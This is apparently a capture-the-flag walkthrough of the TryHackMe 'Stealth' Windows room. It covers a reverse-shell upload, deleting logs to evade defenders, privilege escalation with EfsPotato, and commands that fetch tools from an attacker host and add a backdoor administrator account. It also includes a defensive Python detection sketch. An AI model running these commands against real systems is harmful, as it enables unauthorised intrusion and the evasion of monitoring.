We covered the TryHackMe Stealth machine, going through the usual stages of enumerating open ports and services with Nmap before finding an upload form that acts as a PowerShell script analyzer. We uploaded a PowerShell reverse shell script to gain the first foothold, deleting the log files each time so the connection stayed alive and did not draw the attention of the blue team. We then ran the PrivescCheck script to enumerate available privilege escalation vectors and found that the current user had complete control over the web server process, so we uploaded a webshell and ran the EfsPotato exploit to obtain SYSTEM access.

TryHackMe Stealth Challenge Description

Use your evasion skills to pwn a Windows target with an updated defence mechanism.

Initial Foothold & Evasion

My journey began with reconnaissance and gaining an initial shell:

  1. Scanning: I started with an nmap scan to identify open ports. The crucial ones I found were the RDP port and a web server running on multiple ports, notably port 8443 (HTTPS with an SSL certificate).
  2. Web Server Exploitation (First Shell): The web page on port 8443 had an upload form designed for analyzing PowerShell scripts (.ps1 files). I exploited this by uploading a PowerShell reverse shell to gain initial access. I used a script similar to PowerShell-reverse-shell.ps1, making sure to modify the IP address to my attacker machine’s IP.
  3. Log File Evasion: Once I got the reverse shell, I immediately noticed it was unstable. I quickly discovered that my attempts were being logged in two locations: a log file in a documents directory and another in the web server’s uploads directory (under xampp\htdocs\uploads), which logged the commands I executed. The critical part here was that if I didn’t delete these logs, the “Blue Team” would terminate my connection. My solution was to immediately delete both log files to maintain access.
  4. Stabilizing Access (Second Shell): In the uploads directory, I found another PowerShell script called vulnerable.ps1. I copied this script, modified it with my attacker IP and a different port, and re-uploaded it to get a more stable second shell. Again, I had to delete the log files immediately after establishing this connection. This second shell ran under the user context of “evader.”

Privilege Escalation

With a stable shell as the “evader” user, I moved on to privilege escalation:

  1. Initial Privilege Checks: I ran whoami /priv as the “evader” user, which showed limited privileges, not enough for direct escalation. Standard enumeration tools like WinPEAS and Watson were ineffective due to the machine’s protections.
  2. PowerShell Enumeration Script: I then used a PowerShell-based privilege escalation script (e.g., privescCheck.ps1). I downloaded this script to the target machine using iwr (Invoke-WebRequest) from a web server I hosted on my attacker machine. The script revealed that the “evader” user had full control over the web server processes.
  3. Webshell for Enhanced Privileges: To leverage this web server control, I uploaded a webshell (like “Pony”) to the web server’s root directory. I accessed this webshell via a different port where another instance of the web server was running (port 8080 in this case). Running whoami /priv from this webshell showed that the “evader” user now had the “SeImpersonatePrivilege”. This was a significant step!
  4. Exploiting SeImpersonatePrivilege with EFS Potato: I knew that several tools could exploit SeImpersonatePrivilege, including Juicy Potato, Rogue Potato, and EFS Potato. I focused on EFS Potato. I transferred the EFS Potato exploit to the target machine (likely via curl or iwr from my web server) and stored it in the web server directory. The exploit needed to be compiled on the target machine. I had to troubleshoot the .NET Framework version required for compilation, eventually finding the correct version (v4.0.30319). Once compiled, EFS Potato allowed me to execute commands as NT AUTHORITY\SYSTEM.
  5. Gaining System Access & Persistence: With SYSTEM access, I added a new user (“pawn”) to the machine and then added this user to the local administrators group using EFS Potato to execute the necessary net user commands. I noted some issues with password complexity and found a working password format. Finally, I used RDP to log in as my newly created administrator user (“pawn”) to retrieve the root flag.
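As an added example (not part of the original walkthrough), the following Python sketches the detection logic a blue team could run over forwarded Windows Security events to catch the chain described above: deletion of the log in the web server's uploads directory, a shell spawned by the web server process, a SYSTEM-token process launched from the webroot, and a freshly created user being added to Administrators. The event IDs are the standard Security log IDs (4663 object access, 4688 process creation, 4720 user created, 4732 member added to local group); every record, path (the XAMPP default webroot is assumed), username and the `token_user` field are constructed sample data, not output from the room.

```python
"""Detection rules for the post-exploitation chain in the Stealth walkthrough,
run over CONSTRUCTED Windows Security event records (sample data only)."""

import ntpath
from typing import Dict, List, Tuple

# Assumed XAMPP default webroot; adjust to the deployment being monitored.
WEBROOT = r"c:\xampp\htdocs"
WEB_SERVER_PARENTS = {"httpd.exe", "w3wp.exe", "nginx.exe", "php-cgi.exe", "php.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DELETE_MASK = 0x10000  # DELETE bit of the 4663 AccessMask field

# Constructed sample events modelled on Security log fields.  "token_user" is an
# assumed normalised field for the account the new process runs as.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 4663, "subject": "evader", "object": r"C:\xampp\htdocs\uploads\log.txt",
     "access_mask": 0x10000},
    {"id": 4688, "subject": "evader", "parent": r"C:\xampp\apache\bin\httpd.exe",
     "new_process": r"C:\Windows\System32\cmd.exe"},
    {"id": 4688, "subject": "evader", "parent": r"C:\xampp\htdocs\EfsPotato.exe",
     "new_process": r"C:\Windows\System32\cmd.exe",
     "token_user": "NT AUTHORITY\\SYSTEM"},
    {"id": 4720, "subject": "NT AUTHORITY\\SYSTEM", "target_user": "pawn"},
    {"id": 4732, "subject": "NT AUTHORITY\\SYSTEM", "target_user": "pawn",
     "group": "Administrators"},
    # Benign noise: an administrator creating a service account (no group change).
    {"id": 4720, "subject": "ITAdmin", "target_user": "svc_backup"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def detect(events: List[Dict]) -> List[Tuple[str, str]]:
    """Return (rule_name, detail) pairs for every rule that fires, in event order."""
    findings: List[Tuple[str, str]] = []
    created_users = set()  # users seen in 4720, for correlating with 4732

    for ev in events:
        eid = ev["id"]

        if eid == 4663 and ev.get("access_mask", 0) & DELETE_MASK:
            obj = ev["object"].lower()
            # Deleting anything under the webroot, or any log-named file, is suspect.
            if obj.startswith(WEBROOT) or "log" in basename(obj):
                findings.append(("log_tampering",
                                 f"{ev['subject']} deleted {ev['object']}"))

        elif eid == 4688:
            parent, child = basename(ev["parent"]), basename(ev["new_process"])
            # A web server worker should not be launching interactive shells.
            if parent in WEB_SERVER_PARENTS and child in SHELLS:
                findings.append(("webserver_spawned_shell",
                                 f"{ev['parent']} -> {ev['new_process']}"))
            # A binary living in the webroot producing a SYSTEM-token child is the
            # signature of a potato-style impersonation escalation.
            if (ev["parent"].lower().startswith(WEBROOT)
                    and ev.get("token_user", "").upper() == "NT AUTHORITY\\SYSTEM"):
                findings.append(("system_token_from_webroot",
                                 f"{ev['parent']} spawned {ev['new_process']} as SYSTEM"))

        elif eid == 4720:
            created_users.add(ev["target_user"].lower())

        elif eid == 4732 and ev["group"].lower() == "administrators":
            user = ev["target_user"].lower()
            if user in created_users:
                findings.append(("new_user_added_to_admins",
                                 f"{ev['subject']} created {user} and made it an administrator"))

    return findings


def rules_fired(events: List[Dict]) -> List[str]:
    """Just the rule names, for quick checks."""
    return [rule for rule, _ in detect(events)]


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:28} {detail}")
```

The rules only work if the events leave the host before an attacker can touch them, which is the point the log-deletion step makes: forward Security events to a collector rather than relying on files in the uploads directory. On the mitigation side, the escalation hinges on the web server account holding SeImpersonatePrivilege; a web service account that does not need to impersonate clients should not be granted it.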

Technical Commands I Used:

Here are the technical commands I executed on the terminal:

  • whoami /priv
  • python3 -m http.server <port> (Used for hosting files on my attacker machine, specifically python3 -m http.server 80)
  • iwr http://<attacker_IP>:<port>/<script_name> -OutFile <script_name> (Used for downloading scripts to the target)
  • .\privescCheck.ps1 -Extended (Running the privilege escalation script with extended checks)
  • curl http://<attacker_IP>:<port>/EfsPotato.exe -o EfsPotato.exe (Downloading EFS Potato)
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:EfsPotato.exe EfsPotato.cs (Compiling EFS Potato)
  • .\EfsPotato.exe "whoami"
  • .\EfsPotato.exe "net user pawn <password> /add && net localgroup administrators pawn /add" (Adding a user and adding them to the administrators group)

Room Answers

What is the content of the user level flag?

What is the content of the root level flag?

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.